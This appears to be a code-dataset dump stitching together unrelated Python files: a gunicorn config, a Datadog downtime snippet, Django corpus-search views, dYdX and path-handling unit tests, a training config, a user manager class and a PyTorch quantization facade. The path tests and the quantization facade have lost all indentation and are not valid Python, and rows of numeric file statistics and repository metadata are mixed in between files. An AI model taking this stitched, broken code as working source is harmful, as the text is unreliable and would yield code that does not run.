# --- source/blockchain_backup/config/gunicorn.conf.py | denova-com/blockchain-backup | OLDAP-2.6 / OLDAP-2.4 ---
# The configuration file should be a valid Python source file with a python
# extension (e.g. gunicorn.conf.py).
# See https://docs.gunicorn.org/en/stable/configure.html
bind='127.0.0.1:8962'
timeout=75
daemon=True
user='user'
accesslog='/var/local/log/user/blockchain_backup.gunicorn.access.log'
errorlog='/var/local/log/user/blockchain_backup.gunicorn.error.log'
loglevel='debug'  # gunicorn's setting is named "loglevel"; a "log_level" key is silently ignored
capture_output=True
max_requests=3
workers=1
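
# This file is handed to gunicorn via its -c/--config option, e.g.
# (the WSGI module path is illustrative):
#   gunicorn -c gunicorn.conf.py blockchain_backup.wsgi:application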
# --- code_snippets/api-monitor-schedule-downtime.py | brettlangdon/documentation | BSD-3-Clause ---

import time  # needed for time.time() below

from datadog import initialize, api
options = {
    'api_key': 'api_key',
    'app_key': 'app_key'
}
initialize(**options)
# Schedule downtime
api.Downtime.create(scope='env:staging', start=int(time.time()))
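
# Companion sketch (not in the original snippet): the id returned by create()
# can be used to cancel the downtime later; datadogpy exposes a matching
# Downtime.delete for this.
downtime = api.Downtime.create(scope='env:staging', start=int(time.time()))
api.Downtime.delete(downtime['id'])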
# --- plugins/base/views.py | adlerosn/corpusslayer | MIT ---

# Copyright (c) 2017 Adler Neves <adlerosn@gmail.com>
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
pluginName = os.path.abspath(__file__).split(os.path.sep)[-2]
importline1 = 'import '+('.'.join(['plugins',pluginName,'models'])+' as models')
importline2 = 'import '+('.'.join(['plugins',pluginName,'forms'])+' as forms')
exec(importline1) #import plugins.thisplugin.models as models
exec(importline2) #import plugins.thisplugin.forms as forms
import application.forms as app_forms
import application.models as app_models
import application.business as app_ctrl
from django.utils.translation import ugettext_lazy as _
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views.generic import View
from django.views.generic import TemplateView
from django.template.response import TemplateResponse
from django.http import Http404
from django.urls import reverse
from django.core.paginator import Paginator
from urllib.parse import urlencode
from view.pages.views import SoonView, TemplateViewLoggedIn, UserPartEditFormView
from view.pages.views import CrudDeleteView, CrudEditView, CrudListView
import re
import json
import base64
def escapeRegex(s):
    o = ''
    for c in s:
        if c in ',.+*?|^$[]{}()\\':
            o += '\\'
        o += c
    return o


def findFirstStringAtZero(el):
    if isinstance(el, str):
        return el
    else:
        return findFirstStringAtZero(el[0])


class MockRegexSeachWithIn:
    def __init__(self, data):
        self.data = data

    def search(self, bigger):
        if bigger.__contains__(self.data):
            return True
        return None


# Create your views here.
class DocumentView(TemplateViewLoggedIn):
    template_name = 'plugins/base/document.html'

    def get(self, request, corpus_pk='0', doc_pk='0'):
        bl = app_ctrl.Business(request)
        document = app_models.Document.objects.get(user__id=bl.user.id, corpus__pk=corpus_pk, pk=doc_pk)
        corpus = document.corpus
        return render(request, self.template_name, {
            'corpus': corpus,
            'document': document,
            'textlines': document.text.strip().splitlines(),
        })


class FinderView(TemplateViewLoggedIn):
    template_name = 'plugins/base/finder.html'

    def get(self, request, corpus_pk='0', fragment=''):
        bl = app_ctrl.Business(request)
        corpus = app_models.Corpus.objects.get(user__id=bl.user.id, pk=corpus_pk)
        documents = corpus.documents.all()
        wanted = json.loads(base64.b64decode(fragment).decode('utf-8'))
        searched = None
        if isinstance(wanted, str):
            searched = escapeRegex(wanted.strip())
            searched = searched.replace(' ', '\\s*')
            wanted = re.compile(searched)
        else:
            searched = '\\s*'.join(map(escapeRegex, map(findFirstStringAtZero, wanted)))
            wanted = re.compile(searched)
        matchedDocs = list()
        for document in documents:
            if wanted.search(document.text) is not None:
                matchedDocs.append(document)
        matchedDocs.sort(key=lambda a: a.title)
        if len(matchedDocs) <= 0:
            raise Http404("Couldn't find any document with: " + searched)
        if len(matchedDocs) == 1:
            return HttpResponseRedirect(reverse('base_document', None, [corpus_pk, matchedDocs[0].pk]))
        return render(request, self.template_name, {
            'query': searched,
            'corpus': corpus,
            'documents': matchedDocs,
        })
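
# Sketch of how a caller could produce the base64-encoded JSON `fragment`
# that FinderView expects (the query string here is illustrative):
#
#   import base64, json
#   fragment = base64.b64encode(json.dumps("steam engine").encode("utf-8")).decode("ascii")
#   # route a GET to FinderView with this fragment and a corpus pk in the URL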
# --- tests/test_constants.py | 9cat/dydx-v3-python | Apache-2.0 ---

from dydx3.constants import SYNTHETIC_ASSET_MAP, SYNTHETIC_ASSET_ID_MAP, ASSET_RESOLUTION, COLLATERAL_ASSET
class TestConstants():
    def test_constants_have_regular_structure(self):
        for market, asset in SYNTHETIC_ASSET_MAP.items():
            market_parts = market.split('-')
            base_token, quote_token = market_parts
            assert base_token == asset
            assert quote_token == 'USD'
            assert len(market_parts) == 2
        assert list(SYNTHETIC_ASSET_MAP.values()) == list(SYNTHETIC_ASSET_ID_MAP.keys())
        assets = [x for x in ASSET_RESOLUTION.keys() if x != COLLATERAL_ASSET]
        assert assets == list(SYNTHETIC_ASSET_MAP.values())
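
# Illustrative (made-up) shapes that would satisfy the invariants above:
#   SYNTHETIC_ASSET_MAP    e.g. {"BTC-USD": "BTC", "ETH-USD": "ETH", ...}
#   SYNTHETIC_ASSET_ID_MAP keyed by those same synthetic assets, in order
#   ASSET_RESOLUTION       covers every synthetic asset plus COLLATERAL_ASSET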
# --- cifar_exps/metric/local_config.py | maestrojeong/Deep-Hash-Table-ICML18- | MIT ---

import sys
sys.path.append("../../configs")
#../../configs
from path import EXP_PATH
import numpy as np
DECAY_PARAMS_DICT = {
    'stair': {
        128: {
            'a1': {'initial_lr': 1e-5, 'decay_steps': 50000, 'decay_rate': 0.3},
            'a2': {'initial_lr': 3e-4, 'decay_steps': 50000, 'decay_rate': 0.3},
            'a3': {'initial_lr': 1e-3, 'decay_steps': 50000, 'decay_rate': 0.3},
            'a4': {'initial_lr': 3e-3, 'decay_steps': 50000, 'decay_rate': 0.3},
            'a5': {'initial_lr': 1e-2, 'decay_steps': 50000, 'decay_rate': 0.3}
        }
    },
    'piecewise': {
        128: {
            'a1': {'boundaries': [10000, 20000], 'values': [1e-4, 3e-5, 1e-5]},
            'a2': {'boundaries': [10000, 20000], 'values': [3e-4, 1e-4, 3e-5]},
            'a3': {'boundaries': [10000, 20000], 'values': [1e-3, 3e-4, 1e-4]},
            'a4': {'boundaries': [10000, 20000], 'values': [3e-3, 1e-3, 3e-4]},
            'a5': {'boundaries': [10000, 20000], 'values': [1e-2, 3e-3, 1e-3]},
            'b1': {'boundaries': [20000, 35000], 'values': [1e-4, 3e-5, 1e-5]},
            'b2': {'boundaries': [20000, 35000], 'values': [3e-4, 1e-4, 3e-5]},
            'b3': {'boundaries': [20000, 35000], 'values': [1e-3, 3e-4, 1e-4]},
            'b4': {'boundaries': [20000, 35000], 'values': [3e-3, 1e-3, 3e-4]},
            'b5': {'boundaries': [20000, 35000], 'values': [1e-2, 3e-3, 1e-3]}
        }
    }
}
ACTIVATE_K_SET = np.arange(1, 5)
K_SET = [1,4,16]
RESULT_DIR = EXP_PATH+"cifar_exps/"
#========================PARAM============================#
DATASET= 'cifar'
GPU_ID = 0
BATCH_SIZE = 128
EPOCH = 300
NSCLASS = 16
# model
EMBED_M= 64
CONV_NAME = 'conv1'
# metric loss
LOSS_TYPE = 'triplet'
MARGIN_ALPHA = 0.3
LAMBDA = 0.003 # regularization for npair
# learning
DECAY_TYPE = 'stair'
DECAY_PARAM_TYPE = 'a3'
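
# Illustrative lookup (not in the original file) showing how the table is
# keyed: decay type -> batch size -> config id -> schedule parameters.
params = DECAY_PARAMS_DICT[DECAY_TYPE][BATCH_SIZE][DECAY_PARAM_TYPE]
# -> {'initial_lr': 1e-3, 'decay_steps': 50000, 'decay_rate': 0.3}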
# --- POO punto 2/ManagerUsers.py | nan0te/Python-Algorithm-And-DataStructure | MIT ---
from Profesional import Profesional
from Particular import Particular
from Comercial import Comercial


class ManagerUsers:
    userslist = []

    def addProfesional(self, name, address, baja, area, titulo):
        profesional = Profesional(name, address, baja, area, titulo)
        self.userslist.append(profesional)

    def addParticular(self, name, address, baja, dni, fechaNac):
        particular = Particular(name, address, baja, dni, fechaNac)
        self.userslist.append(particular)

    def addComercial(self, name, address, baja, rubro, cuilt):
        comercial = Comercial(name, address, baja, rubro, cuilt)
        self.userslist.append(comercial)

    def searchUser(self, name):
        for user in self.userslist:
            if name == user.getName():
                user.muestra()

    def imprimirUsuarios(self):
        for user in self.userslist:
            user.muestra()

    def deleteUser(self, name):
        position = 0
        for user in self.userslist:
            if name == user.getName():
                self.userslist.pop(position)  # remove the matching user from the list
                return
            position = position + 1
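
# Usage sketch (argument values are made up; assumes Profesional/Particular/
# Comercial implement getName() and muestra(), as the methods above imply):
manager = ManagerUsers()
manager.addParticular("Ana", "Calle Falsa 123", False, "12345678", "1990-01-01")
manager.imprimirUsuarios()
manager.deleteUser("Ana")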
# --- tests/test_gpath.py | ConductorTechnologies/ciopath | MIT ---

""" test gpath
isort:skip_file
"""
import os
import sys
import unittest
try:
from unittest import mock
except ImportError:
import mock
SRC = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
if SRC not in sys.path:
sys.path.insert(0, SRC)
from ciopath.gpath import Path
sys.modules["glob"] = __import__("mocks.glob", fromlist=["dummy"])
class BadInputTest(unittest.TestCase):
def test_empty_input(self):
with self.assertRaises(ValueError):
self.p = Path("")
class RootPath(unittest.TestCase):
def test_root_path(self):
self.p = Path("/")
self.assertEqual(self.p.fslash(), "/")
self.assertEqual(self.p.bslash(), "\\")
def test_drive_letter_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(), "C:/")
self.assertEqual(self.p.bslash(), "C:\\")
class SpecifyDriveLetterUse(unittest.TestCase):
def test_remove_from_path(self):
self.p = Path("C:\\a\\b\\c")
self.assertEqual(self.p.fslash(with_drive=False), "/a/b/c")
self.assertEqual(self.p.bslash(with_drive=False), "\\a\\b\\c")
def test_remove_from_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(with_drive=False), "/")
self.assertEqual(self.p.bslash(with_drive=False), "\\")
class AbsPosixPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("/a/b/c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "\\a\\b\\c")
class AbsWindowsPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("C:\\a\\b\\c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "C:/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
# consider just testing on both platforms
def test_os_path_out(self):
with mock.patch("os.name", "posix"):
self.assertEqual(self.p.os_path(), "C:/a/b/c")
with mock.patch("os.name", "nt"):
self.assertEqual(self.p.os_path(), "C:\\a\\b\\c")
class PathStringTest(unittest.TestCase):
def test_path_emits_string_posix(self):
input_file = "/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_with_drive(self):
input_file = "C:/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_relative(self):
input_file = "path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
class WindowsMixedPathTest(unittest.TestCase):
def test_abs_in_fslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "/a/b/c/d/e")
def test_abs_in_bslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "\\a\\b\\c\\d\\e")
def test_letter_abs_in_fslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "C:/a/b/c/d/e")
def test_letter_abs_in_bslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c\\d\\e")
class MiscPathTest(unittest.TestCase):
def test_many_to_single_backslashes_bslash_out(self):
self.p = Path("C:\\\\a\\b///c")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
class PathExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
def test_posix_tilde_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_posix_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/c")
def test_posix_two_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/$DEPT/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/texturing/c")
def test_windows_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$HOME\\a\\b\\c")
self.assertEqual(self.p.bslash(), "\\users\\joebloggs\\a\\b\\c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_tilde_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "~/a/b/c")
def test_posix_var_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "$SHOT/a/b/c")
def test_no_expand_variable_considered_relative(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertTrue(self.p.relative)
self.assertFalse(self.p.absolute)
def test_expanded_variable_considered_absolute(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=False)
self.assertFalse(self.p.relative)
self.assertTrue(self.p.absolute)
class PathContextExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
self.context = {
"HOME": "/users/janedoe",
"FOO": "fooval",
"BAR_FLY1_": "bar_fly1_val",
"ROOT_DIR": "/some/root",
}
def test_path_replaces_context(self):
self.p = Path("$ROOT_DIR/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env(self):
self.p = Path("$HOME/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leaves_unknown_variable_intact(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/$FOO/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
def test_path_replaces_context_braces(self):
self.p = Path("${ROOT_DIR}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env_braces(self):
self.p = Path("${HOME}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leaves_unknown_variable_intact_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/${FOO}/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
class PathLengthTest(unittest.TestCase):
def test_len_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(len(self.p), 12)
def test_len_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(len(self.p), 10)
def test_depth_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_literal_rel_path(self):
self.p = Path("aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
class AbsolutePathCollapseDotsTest(unittest.TestCase):
def test_path_collapses_single_dot(self):
p = Path("/a/b/./c")
self.assertEqual(p.fslash(), "/a/b/c")
def test_path_collapses_double_dot(self):
p = Path("/a/b/../c")
self.assertEqual(p.fslash(), "/a/c")
def test_path_collapses_many_single_dots(self):
p = Path("/a/b/./c/././d")
self.assertEqual(p.fslash(), "/a/b/c/d")
def test_path_collapses_many_consecutive_double_dots(self):
p = Path("/a/b/c/../../d")
self.assertEqual(p.fslash(), "/a/d")
def test_path_collapses_many_non_consecutive_double_dots(self):
p = Path("/a/b/c/../../d/../e/f/../g")
self.assertEqual(p.fslash(), "/a/e/g")
def test_path_collapses_many_non_consecutive_mixed_dots(self):
p = Path("/a/./b/c/../.././d/../././e/f/../g/./")
self.assertEqual(p.fslash(), "/a/e/g")
self.assertEqual(p.depth, 3)
def test_path_collapses_to_root(self):
p = Path("/a/b/../../")
self.assertEqual(p.fslash(), "/")
self.assertEqual(p.depth, 0)
def test_raise_when_collapse_too_many_dots(self):
with self.assertRaises(ValueError):
Path("/a/b/../../../")
class RelativePathCollapseDotsTest(unittest.TestCase):
def test_resolve_relative_several_dots(self):
p = Path("./a/b/../../../c/d")
self.assertEqual(p.fslash(), "../c/d")
self.assertEqual(p.all_components, ["..", "c", "d"])
self.assertEqual(p.depth, 3)
def test_resolve_leading_relative_dots(self):
p = Path("../c/d")
self.assertEqual(p.fslash(), "../c/d")
def test_resolve_multiple_leading_relative_dots(self):
p = Path("../../../c/d")
self.assertEqual(p.fslash(), "../../../c/d")
def test_resolve_only_relative_dots(self):
p = Path("../../../")
self.assertEqual(p.fslash(), "../../../")
def test_collapse_contained_components(self):
p = Path("../../../a/b/../../../")
self.assertEqual(p.fslash(), "../../../../")
def test_remove_trailing_dot(self):
p = Path("../../.././")
self.assertEqual(p.fslash(), "../../../")
def test_cwd(self):
p = Path(".")
self.assertEqual(p.fslash(), "./")
def test_down_up_cwd(self):
p = Path("a/..")
self.assertEqual(p.fslash(), "./")
def test_up_down_sibling(self):
p = Path("../a")
self.assertEqual(p.fslash(), "../a")
def test_up_down_sibling_bslash(self):
p = Path("../a")
self.assertEqual(p.bslash(), "..\\a")
class PathComponentsTest(unittest.TestCase):
def test_path_gets_tail(self):
p = Path("/a/b/c")
self.assertEqual(p.tail, "c")
def test_path_gets_none_when_no_tail(self):
p = Path("/")
self.assertEqual(p.tail, None)
def test_path_ends_with(self):
p = Path("/a/b/cdef")
self.assertTrue(p.endswith("ef"))
def test_path_not_ends_with(self):
p = Path("/a/b/cdef")
self.assertFalse(p.endswith("eg"))
class RelativePathTest(unittest.TestCase):
def test_rel_path_does_not_raise(self):
p = Path("a/b/c")
self.assertEqual(p.fslash(), "a/b/c")
class EqualityTests(unittest.TestCase):
def test_paths_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/c")
self.assertTrue(p1 == p2)
def test_same_object_equal(self):
p1 = Path("a/b/c")
self.assertTrue(p1 == p1)
def test_different_paths_equal_false(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertFalse(p1 == p2)
def test_paths_not_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertTrue(p1 != p2)
class InitializeWithComponentsTests(unittest.TestCase):
def test_initialize_with_lettered_components(self):
p = Path(["C:", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "C:/a/b/c")
def test_initialize_with_backslash_unc_components(self):
p = Path(["\\", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_fwslash_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "\\\\a\\b\\c")
def test_initialize_with_relative_components(self):
p = Path(["a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "a\\b\\c")
def test_initialize_with_relative_components_is_relative(self):
p = Path(["a", "b", "c"])
self.assertTrue(p.relative)
self.assertFalse(p.absolute)
class GetComponentsTests(unittest.TestCase):
def test_get_all_components(self):
p = Path("/a/b/c")
self.assertEqual(p.all_components, ["a", "b", "c"])
def test_get_all_components_with_drive(self):
p = Path("C:/a/b/c")
self.assertEqual(p.all_components, ["C:", "a", "b", "c"])
def test_get_all_components_with_unc_fwslash(self):
p = Path("//a/b/c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
def test_get_all_components_with_unc_backslash(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
class UNCTests(unittest.TestCase):
def test_unc_root_with_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_unc_is_absolute(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.absolute)
def test_unc_root_without_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=False), "/a/b/c")
def test_unc_root_with_forward(self):
p = Path("//a/b/c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_is_unc(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.is_unc)
p = Path("//a/b/c")
self.assertTrue(p.is_unc)
def test_posix_abs_is_not_unc(self):
p = Path(["/a/b/c"])
self.assertFalse(p.is_unc)
def test_relative_is_not_unc(self):
p = Path(["a/b/c"])
self.assertFalse(p.is_unc)
def test_drive_letter_is_not_unc(self):
p = Path("C:\\aaa\\bbb\\c")
self.assertFalse(p.is_unc)
if __name__ == "__main__":
unittest.main()
| 32.620614 | 93 | 0.604034 | 2,099 | 14,875 | 4.079562 | 0.093378 | 0.067733 | 0.028378 | 0.086418 | 0.75616 | 0.698937 | 0.67815 | 0.645101 | 0.600958 | 0.55588 | 0 | 0.003749 | 0.210891 | 14,875 | 455 | 94 | 32.692308 | 0.725762 | 0.004571 | 0 | 0.324324 | 0 | 0 | 0.137199 | 0.046634 | 0 | 0 | 0 | 0 | 0.294294 | 1 | 0.264264 | false | 0 | 0.024024 | 0 | 0.345345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b188c34a63c4e8f52180a384c6fb116f6a431c46 | 7,184 | py | Python | model_compression_toolkit/gptq/pytorch/quantization_facade.py | ofirgo/model_optimization | 18be895a35238df128913183b05e60550c2b6e6b | [
"Apache-2.0"
] | 42 | 2021-10-31T10:17:49.000Z | 2022-03-21T08:51:46.000Z | model_compression_toolkit/gptq/pytorch/quantization_facade.py | ofirgo/model_optimization | 18be895a35238df128913183b05e60550c2b6e6b | [
"Apache-2.0"
] | 6 | 2021-10-31T15:06:03.000Z | 2022-03-31T10:32:53.000Z | model_compression_toolkit/gptq/pytorch/quantization_facade.py | ofirgo/model_optimization | 18be895a35238df128913183b05e60550c2b6e6b | [
"Apache-2.0"
] | 18 | 2021-11-01T12:16:43.000Z | 2022-03-25T16:52:37.000Z | # Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Callable
from model_compression_toolkit.core import common
from model_compression_toolkit.core.common import Logger
from model_compression_toolkit.core.common.constants import PYTORCH
from model_compression_toolkit.gptq.common.gptq_config import GradientPTQConfig
from model_compression_toolkit.core.common.target_platform import TargetPlatformCapabilities
from model_compression_toolkit.core.common.mixed_precision.kpi import KPI
from model_compression_toolkit.core.common.framework_info import FrameworkInfo
from model_compression_toolkit import CoreConfig
from model_compression_toolkit.core.common.mixed_precision.mixed_precision_quantization_config import \
MixedPrecisionQuantizationConfigV2
from model_compression_toolkit.core.common.post_training_quantization import post_training_quantization
import importlib
if importlib.util.find_spec("torch") is not None:
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from model_compression_toolkit.core.pytorch.constants import DEFAULT_TP_MODEL
from torch.nn import Module
from model_compression_toolkit import get_target_platform_capabilities
DEFAULT_PYTORCH_TPC = get_target_platform_capabilities(PYTORCH, DEFAULT_TP_MODEL)
def pytorch_gradient_post_training_quantization_experimental(in_module: Module,
representative_data_gen: Callable,
target_kpi: KPI = None,
core_config: CoreConfig = CoreConfig(),
fw_info: FrameworkInfo = DEFAULT_PYTORCH_INFO,
gptq_config: GradientPTQConfig = None,
target_platform_capabilities: TargetPlatformCapabilities = DEFAULT_PYTORCH_TPC):
"""
Quantize a trained Pytorch module using post-training quantization.
By default, the module is quantized using a symmetric constraint quantization thresholds
(power of two) as defined in the default TargetPlatformCapabilities.
The module is first optimized using several transformations (e.g. BatchNormalization folding to
preceding layers). Then, using a given dataset, statistics (e.g. min/max, histogram, etc.) are
being collected for each layer's output (and input, depends on the quantization configuration).
Thresholds are then being calculated using the collected statistics and the module is quantized
(both coefficients and activations by default).
If gptq_config is passed, the quantized weights are optimized using gradient based post
training quantization by comparing points between the float and quantized modules, and minimizing the
observed loss.
Args:
in_module (Module): Pytorch module to quantize.
representative_data_gen (Callable): Dataset used for calibration.
target_kpi (KPI): KPI object to limit the search of the mixed-precision configuration as desired.
core_config (CoreConfig): Configuration object containing parameters of how the model should be quantized, including mixed precision parameters.
fw_info (FrameworkInfo): Information needed for quantization about the specific framework (e.g., kernel channels indices, groups of layers by how they should be quantized, etc.). `Default PyTorch info <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/pytorch/default_framework_info.py>`_
gptq_config (GradientPTQConfig): Configuration for using gptq (e.g. optimizer).
target_platform_capabilities (TargetPlatformCapabilities): TargetPlatformCapabilities to optimize the PyTorch model according to. `Default PyTorch TPC <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/tpc_models/pytorch_tp_models/pytorch_default.py>`_
Returns:
A quantized module and information the user may need to handle the quantized module.
Examples:
Import a Pytorch module:
>>> import torchvision.models.mobilenet_v2 as models
>>> module = models.mobilenet_v2()
Create a random dataset generator:
>>> import numpy as np
>>> def repr_datagen(): return [np.random.random((1, 3, 224, 224))]
Import mct and pass the module with the representative dataset generator to get a quantized module:
>>> import model_compression_toolkit as mct
>>> quantized_module, quantization_info = mct.pytorch_gradient_post_training_quantization_experimental(module, repr_datagen)
"""
if core_config.mixed_precision_enable:
if not isinstance(core_config.mixed_precision_config, MixedPrecisionQuantizationConfigV2):
common.Logger.error("Given quantization config to mixed-precision facade is not of type "
"MixedPrecisionQuantizationConfigV2. Please use pytorch_post_training_quantization API,"
"or pass a valid mixed precision configuration.")
common.Logger.info("Using experimental mixed-precision quantization. "
"If you encounter an issue please file a bug.")
return post_training_quantization(in_module,
representative_data_gen,
core_config,
fw_info,
PytorchImplementation(),
target_platform_capabilities,
gptq_config,
target_kpi=target_kpi)
else:
# If torch is not installed,
# we raise an exception when trying to use these functions.
def pytorch_gradient_post_training_quantization_experimental(*args, **kwargs):
Logger.critical('Installing Pytorch is mandatory '
'when using pytorch_gradient_post_training_quantization_experimental. '
'Could not find the torch package.')
| 60.369748 | 334 | 0.680122 | 783 | 7,184 | 6.058748 | 0.321839 | 0.057336 | 0.08242 | 0.07968 | 0.177909 | 0.157462 | 0.090852 | 0.068086 | 0.029511 | 0.029511 | 0 | 0.003956 | 0.260997 | 7,184 | 118 | 335 | 60.881356 | 0.889621 | 0.464226 | 0 | 0 | 0 | 0 | 0.120762 | 0.035304 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0.021277 | 0.382979 | 0 | 0.446809 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
